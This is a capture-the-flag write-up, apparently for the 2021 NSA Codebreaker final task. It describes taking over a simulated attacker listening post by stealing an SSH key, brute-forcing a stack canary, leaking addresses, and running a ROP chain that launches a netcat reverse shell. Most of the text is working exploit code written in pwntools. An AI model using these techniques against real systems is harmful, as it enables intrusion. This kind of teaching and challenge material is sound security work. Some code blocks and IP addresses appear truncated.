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Task 10

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NSA worked with FBI to notify all of the identified victims, who in turn notified DC3. Nicely done.

The final task is to uncover additional information about the actor's infrastructure.

Gain access to the LP. Provide the IP and port that the psuser account has transmitted data to. What lies behind the listening post?

Enter the next IP in the actor's infrastructure chain

Enter the port the LP connects to on that IP



The final task is here. Somehow we need to upgrade our access to the LP and track down where psuser is sending data.

Note: Once Task 10 had been solved, there was no way to spin up the infrastructure again. I did not save everything needed to recreate the scenario, so some things like the contents of directories may differ from the actual LP server. I did save the important files so the write-up should not be severely impacted.


In task 9 we found that we could specify a directory to list. We also have a way to upload and cat files. We should be able to use this to poke around on the LP and see if we can find something that gets us a better interface into the LP.

The parser output was fine for task 9, but now we need to remove all of the excess information and just print out the stuff we care about. The new is much cleaner. Using this new client I started looking around and found several home directories: The contents of lpuser were all readable, but the contents of the others were not.

There are many things to look for when enumerating a home directory like SSH keys and password back-ups. lpuser happens to have a readable private/public RSA key pair that we can steal in its .ssh/ directory!

$ python3
> ls /home/
> ls /home/lpuser
> ls /home/lpuser/.ssh
> cat /home/lpuser/.ssh/id_rsa

> cat /home/lpuser/.ssh/
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCd3yPOtZCKgytYrUnC+ldOBL+BjvEIXkAOPwRr4WZJW0/NO7K3P9ZGO7GS2NU404MV91y8zjYV04Rzie+RsrP5YZEOZv4kkJffSxrExAe8vrxLB0tSkD9TugWFNviiWDd3E6knh+ymoLv97sn+uH9UsN00g3QNpZz3c24/Jq2C+gPbrT9mMdoSSK2U7hJ3nUzsoFhNBZlaR4MBB2n02d7oRYLGwSur3taqf4nKeY7NOJGC+952LzygC19Erjj5/ncFy33xnMobTsIGTKQXdfEfUn0xvCE2Eoz0MY7EKjd41muJ7U30089Xpo9nckX/VKGqEitibDOKEU9gTFgJ+MH/ root@ip-10-115-54-51

Now we can SSH into the LP as lpuser without being limited to the malware commands. The keys can be copied into files id_rsa and and then used like this:

$ ssh -i id_rsa lpuser@<LP IP> 

We're in! Now we have to find out where psuser is sending data. One tool I like to use when first getting on a box is LinEnum, a Linux Enumeration script. It checks a bunch of things like file permissions, users, processes, etc. and then generates a report with the results. The full output can be found in linenum.out. Important findings are listed here:

[-] Current user/group info:
uid=1003(lpuser) gid=1003(lpuser) groups=1003(lpuser)

[-] Jobs held by all users:
@reboot /home/lpuser/lp/ >> /home/lpuser/lp/lp.log 2>&1

[-] Running processes:
lpuser     850  0.0  0.0   4632   768 ?        Ss   13:04   0:00 /bin/sh -c /home/lpuser/lp/ >> /home/lpuser/lp/lp.log 2>&1
psuser     851  0.0  0.0   4632   760 ?        Ss   13:04   0:00 /bin/sh -c /home/psuser/ >> /home/psuser/pslp.log 2>&1
psuser     853  0.0  0.2  13316  2172 ?        S    13:04   0:00 /bin/bash /home/psuser/
lpuser     854  0.0  0.2  13316  2176 ?        S    13:04   0:00 /bin/bash /home/lpuser/lp/
psuser    2219  0.0  0.0   1240   644 ?        S    13:05   0:00 ./powershell_lp

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0  *               LISTEN      -
tcp        0      0 *               LISTEN      -
tcp        0      0    *               LISTEN      -
tcp        0      0  *               LISTEN      2220/python3
tcp6       0      0 :::22                   :::*                    LISTEN      -

Nothing here tells us where psuser might be sending information, but the path forward is starting to reveal itself. We have access to lpuser, which runs the listening post. From the output of ps we can see that psuser is running a PowerShell listening post. Remember the PowerShell malware we looked at in tasks 3 and 4? This is probably the corresponding listening post!

By now we know that port 6666 is the regular listening post, port 22 is SSH, port 53 is probably DNS, so port 8080 is likely the PowerShell listener.

If we can find a flaw in the way powershell_lp is set up, we may be able to pivot to psuser and get the information we need to solve the task. Let's see if we can read any of the powershell_lp-related files from psuser.

$ cat /home/psuser/

echo "Powershell LP Loop -- Start"
sleep 30
cd /home/psuser/
while [ 1 ]
	if [ -f "/tmp/stop_ps" ]; then
		echo "Powershell LP -- Break"
	echo "Powershell LP -- Start"
	sleep 10

echo "Powershell LP Loop -- Exit" is readable. It seems to be a wrapper for powershell_lp that restarts it if the program crashes. If the program stops and /tmp/stop_ps is present then the wrapper exits. This seems exploitable. If we're somehow able to overwrite powershell_lp and then crash the currently running powershell_lp, the wrapper will run our modified version!

Unfortunately I could not find a way to overwrite the file. Permissions appeared to be locked down tight... I eventually moved on.

The next possibility is that there is a flaw in powershell_lp that allows us to obtain code execution as psuser. It's listening on port 8080 and we are able to exfiltrate the binary, so let's load it into Ghidra and look for anything interesting.


Getting Started

$ file powershell_lp
powershell_lp: ELF 64-bit LSB pie executable, x86-64, version 1 (GNU/Linux), dynamically linked, for GNU/Linux 3.2.0, BuildID[sha1]=2d839ebf8fe71992878404be06a9f9ad655ec83b, stripped

We have a stripped binary this time around, no symbols. No more easy-mode. The first step is finding main(). We can do this by going to entry(). This SO answer explains what's going on here and that the first argument to the function in entry() is our main().


Clicking on the first argument takes us to main() and we can start reversing.


The first conditional checks the first parameter, likely argc, to see if any arguments were passed on the command line. If an argument has been provided, a variable is given the argument's value instead of a pre-defined constant. If we click on the global variable we can see it's the string 8080, the port number we believe the PowerShell listening post is listening on. Right-clicking the variable then selecting Data > string correctly sets the variable type.

By re-defining types and renaming variables we can go a long way, but we can do more. The function calls that have the log arguments are interesting. Clicking into them we find a small function that has system call instructions. The argument passed to the syscall is 0x101, or openat (see x64 lookup). This function doesn't do much else, so we can call it open.

Note: I looked for a way to automate the naming of the syscall functions, but couldn't figure it out. If you have a better way to do this let me know!

The fully reversed function looks like this:

Main Reversed

Bug Hunting

Applying this technique to the rest of the program, I reversed the functions that seemed to be important. The gist is that everytime a request comes in, the program forks and calls a request handler. Requests use HTTP (as we saw when reversing the PowerShell malware), so first the handler reads the request headers to find the Content-Length header and then reads the request body. Here's what that request handler looks like:

Handle Request

I spent some time in the read_request_headers() function and found that a Content-Length of -1 was accepted. Sometimes this can lead to a buffer overflow, but signed values seem to be handled properly and I didn't find a way to exploit this.

The next function, read_request_body(socket, buf, length) is where the LP author messed up.

Read Request Body

This function reads data from the victim up to length in a loop. The loop can be broken if the receive call doesn't receive anything (returns 0) or if the counter that keeps track of total bytes read (content_length) is greater than or equal to the maximum length.

The problem is that length is always the maximum length. length should be subtracted by the number of bytes read each time through the loop. Because length never changes, we can send length - 1 bytes which will require the loop to run one more time. On the second call to receive, we can send the full length again, which is length - 1 more content than should be allowed. This will overflow the buffer passed from the request handler.

Exploit Development

Okay, we have the ability to write a maximum of 0x1000 - 1 bytes beyond the end of a buffer in handle_request. That should be enough to overwrite the return pointer. Let's get an environment set up to check if any security measures are enabled and dynamically debug.

Instead of immediately trying to ROP-chaining a shell, it's also a good idea to consider the possibility that we can affect program behavior before the return ever happens. I spent some time seeing if I could make anything interesting happen by modifying values on the stack, but ultimately concluded that a ROP-chain was the way to go.


ghidra2dwarf is an amazing project that allows you to export your decompiled view with symbols to a new ELF binary, allowing for dynamic debugging as if you had source code! I used this to export powershell_lp_dbg and then copied it to my debugging Docker image.

The Dockerfile adds a few configuration options that will make it easier to reverse this binary with forks:

set follow-fork-mode child
set detach-on-fork off

GDB will follow the child of a fork instead of the parent so we can get into handle_request(). detach-on-fork is set to off so we can switch back to the parent once our request handler finishes.

Now if we build the image and run it, we can set a breakpoint at handle_request. Making a request to localhost:8080 from within the container will trigger the breakpoint! You can also expose port 8080 to the host if you want to make requests from the host.

Silencing The Canary

Let's try writing 15 bytes past the buffer like this:

io = start()
io.send(b'Content-Length: -1\r\n\r\n')
io.send(b'a' * 4095)
io.send(b'a' * 16)

The following is printed in the LP:

*** stack smashing detected ***: <unknown> terminated

We're not going to be able to overwrite the return pointer until the canary is dealt with. The bottom of handle_request() contains a canary check:

if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
                // WARNING: Subroutine does not return

Because this request handler is just a fork off of the main parent process which never exits, the canary will not change. This means we can brute-force it. It works by overwriting the first byte of the canary with all (256) possibilities until a crash does not occur. This tells us the first byte, then we can overwrite the second byte to repeat the process.

This technique relies on having an oracle that tells us whether or not stack smashing was detected or the program exited normally. We aren't able to see the stack smashing detected output, so what can we use? The HTTP response is the same for both. Do we have any oracle that can tell us if the canary is what's failing?

Looking at ps_data.log, a world-readable log for the program, we can see the following:

Child 21 handling connection from
Child 21 exited with status 0
Child 23 handling connection from
Child 23 exited due to signal 6

The first exit is a normal request, the second exit is when a canary error is detected! We can brute-force by iterating over each byte until the exit signal is 0!

canary = b''
i = 0
while True:
    print(i, end='')
    if len(canary) == 8:
    io = start()
    io.send(b'Content-Length: -1\r\n\r\n')
    io.send(b'a' * 4095)
    io.send(b'b' + cyclic(8) + canary + p8(i))
    with open('ps_server.log', 'r') as f:
        lines = f.readlines()
        if lines[-1][-2] == '0':
            canary += p8(i)
            print("canary:", canary)
            i = -1
    i += 1

The canary is taken care of!

Leaking Addresses

We can now overwrite the return pointer, but we don't know where we want to go... ASLR and PIE are going to prevent us from copying and pasting addresses we find from the stack, heap, shared libraries, and the binary itself when developing the exploit locally. Somehow we need to leak an address from the process and then calculate the offsets accordingly.

Note: It's possible to do a similar brute-force here by partially overwriting the return pointer byte-by-byte and checking the exit status, but that is slower and not as cool IMO (still pretty cool though)

Without the base address, we can still partially overwrite the last several bits of the address to get useful jumps. I looked for close-by print statements that could potentially print out stack data. That's how I found this call at 0x001099be in start_ps_lp():

FUN_00119b10(DAT_003e7010,"Child %d handling connection from %s:%u\n",pid,remote_addr,

This function looks very similar to fprintf(). It takes in a file descriptor, format string, and a variable number of arguments for that format string. Could we manipulate these arguments by modifying the registers? Let's see what the default arguments would be if we didn't try to manipulate registers. We do this by changing the last byte of the return pointer to 0xbe (which is the first byte to be overwritten because of endianness).


This looks very promising. The first argument is in rdi and FD 4 refers to ps_data.log! The second argument is a pointer to the buffer we control! Once we have the canary this is all we need:

io = start()
io.send(b'Content-Length: -1\r\n\r\n')
io.send(b'a' * 4095)
io.send(b'b' + cyclic(8) + canary + cyclic(24) + b'\xbe')

I had a plan to add a few %x or %p tokens to the buffer that would print out contents of the stack, thus likely revealing some addresses. Amazingly, this isn't necessary at all. This function prints a ton of data to the log file without requiring any intervention and does not stop printing when it reaches a null character. If we perform this call and look at ps_data.log, we get the following:

xxd `ps_data.log`
000057d0: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
000057e0: 6161 6161 6168 0e17 f188 7f00 0061 6161
000057f0: 6161 6161 61b0 0383 e4fe 7f00 008e 0700  aaaaa...........
00005800: 0000 0000 008e 0700 0000 0000 00b0 f682  ................
00005810: e4fe 7f00 0040 8c43 f188 7f00 008e 0700  .....@.C........
00005820: 0000 0000 00f3 e016 f188 7f00 0061 6161
00005830: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00005840: 6161 6161 6100 0000 0000 0000 00a0 0383  aaaaa...........
00005850: e4fe 7f00 00b0 f682 e4fe 7f00 0000 0683  ................
00005860: e4fe 7f00 00b0 0383 e4fe 7f00 008e 0700  ................
00005870: 0000 0000 00a9 d41b f188 7f              ...........

Why does this work? I'm not entirely sure. I expected it to stop printing at the first null byte. If you know what's happening here please let me know!

You might notice that there are addresses in here. The address that ends with 0x68 (starting at the 'h' character in the example above) is 0x7f88f1170e68. The relocated base address can be found by looking at the base address in GDB, 0x7F88F1050000 in this case. The difference between these two values is 0x00120e68. In Ghidra you should be able to find 0x00120e68 and see that it points to a mov qword ptr [r12 + 0x28],rax instruction.

We can't use GDB on the real process we need to exploit, so we will leak the address by jumping to the print function, then read the address from the log file, and then take leaked_address - 0x00120e68 to get the base address for our ROP gadgets!

To parse this automatically we can do this:

# open log and read leaked address
with open('ps_data.log', 'rb') as f:
    x = f.readlines()[-1]

addr_start = x.find(b'a' * 512 + b'h') + 512
addr_string = x[addr_start:addr_start+8]
addr = u64(addr_string)
base_addr = addr - 0x00120e68

A Shell at Last

We've conquered the canary, sidestepped address randomization, and now we must develop a ROP-chain to execute code that will do something useful. If I were to do this over again, I would probably use a ROP-chain generator to spawn a shell and then manipulate the file descriptors for stdin and stdout to correspond to the network FDs like I heard some other people did. The solution I actually used is much less elegant.

I used a tool called ROPgadget to find gadgets in the binary, then hand-rolled a solution based on the gadgets that would execve() the contents of the file /tmp/tmp. Inside /tmp/tmp (a file writable by us on the LP) is a reverse shell that connects to a listener on localhost port 1337:


nc localhost 1337

We need four gadgets for this solution: pop rdi, pop rsi, pop rdx, and pop rax. There are much better ways to do this, but this workflow got the job done for me:

$ ROPgadget --binary powershell_lp | grep "pop rdx ; ret"
0x000000000001cca2 : pop rdx ; ret

In our exploit script, after the canary has been brute-forced and the base address has leaked, we calculate the relocated address of each gadget and place them on the stack along with important addresses that hold strings and syscalls.

The code that makes up our rop chain looks something like this:

; buf = "/tmp"
; sprintf(buf, tmp_string, 4)
pop rdi     ; stack contains memory address of buffer that will store string "/tmp/tmp"
pop rsi     ; stack contains memoery address of "/tmp" string
pop rdx     ; stack contains constant 4
call sprintf; write string

; buf += "/tmp"
; sprintf(buf + 4, tmp_string, 4)
pop rdi
pop rsi
pop rdx
call sprintf

; execve(buf)
; syscall(buf, 0, 0, 0x3b)
pop rdi     ; buf address
pop rsi     ; constant 0
pop rdx     ; constant 0
pop rax     ; constant 0x3b (execve)

jmp syscall ; jump to syscall execution with these args

In our script this translates to:

# use address to calculate rop gadget addresses
pop_rdi = base_addr + 0x00108876
pop_rsi = base_addr + 0x0011a533
pop_rdx = base_addr + 0x0011cca2
pop_rax = base_addr + 0x0010877f
syscall = base_addr + 0x0010a14c
sprintf = base_addr + 0x00108430

# location to build filename
buf = base_addr + 0x3e93c0
# "/tmp" string
arg1 = base_addr + 0x1bfaa0

io = start()
io.send(b'Content-Length: -1\r\n\r\n')
io.send(b'a' * 4095)
io.send(b'b' + 
        cyclic(8) + 
        canary + 
        cyclic(24) + 
        # write /tmp to buf
        p64(pop_rdi) + 
        p64(buf) +
        p64(pop_rsi) + 
        p64(arg1) +
        p64(pop_rdx) +
        p64(4) +
        p64(sprintf) +
        # write /tmp to buf + 4
        p64(pop_rdi) + 
        p64(buf + 4) +
        p64(pop_rsi) + 
        p64(arg1) +
        p64(pop_rdx) +
        p64(4) +
        p64(sprintf) +
        # syscall
        p64(pop_rdi) + # start syscall 
        p64(buf) +
        p64(pop_rsi) +
        p64(0) + 
        p64(pop_rdx) + 
        p64(0) +
        p64(pop_rax) +
        p64(0x3b) + # execve

The final step before exploitation is to set up a listener with:

nc -lvnp 1337

Now the exploit should work and give us a shell as psuser! We can use this to view the contents of the .ssh directory, which has a private/public key pair as well as a config file. SSH configs are typically used to save parameters for different SSH servers instead of needing to remember IPs, usernames, key locations, etc., which is exactly what this one contains:

Host nexthop
    User: user
    IdentityFile: /home/psuser/.ssh/id_rsa

The next hop is clearly! No SSH port is configured here so it's reasonably likely that the port is 22. Submitting this information should work but it doesn't! We must be missing something.

Another place to check when enumerating a new user is their home folder dotfiles. .bashrc, .bash_history, etc. In psuser's .bash_history file we find the following:

cat .bash_history
ls -la
wc ps_*
less ps_data.log
less ps_server.log
man scp
scp -P 36490 ~/ps_data.log nexthop:

A non-standard port is configured when the scp command is run. Now we can be confident that our answer is

That concludes the 2021 challenge!

Complete Message
